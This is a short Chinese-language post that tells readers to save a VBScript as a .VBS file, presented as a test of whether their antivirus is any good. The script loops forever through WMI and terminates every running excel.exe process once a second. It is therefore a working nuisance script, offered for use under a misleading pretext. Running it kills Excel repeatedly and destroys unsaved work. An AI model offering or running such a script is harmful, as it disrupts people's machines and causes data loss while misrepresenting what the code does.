请大家新建一个记事本,将以下内容输入进去,并另存为*.VBS 如果你的杀毒软件报有危险,说明你的杀毒软件不错。否则只能说明你的杀毒软件不行
dim qobj,pipe,good
do
good=\".\"
set qobj=getobject(\"winmgmts:\\\\\"&good&\"\\root\\cimv2\")
set pipe=qobj.execquery(\"select * from win32_process where name='excel.exe'\")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop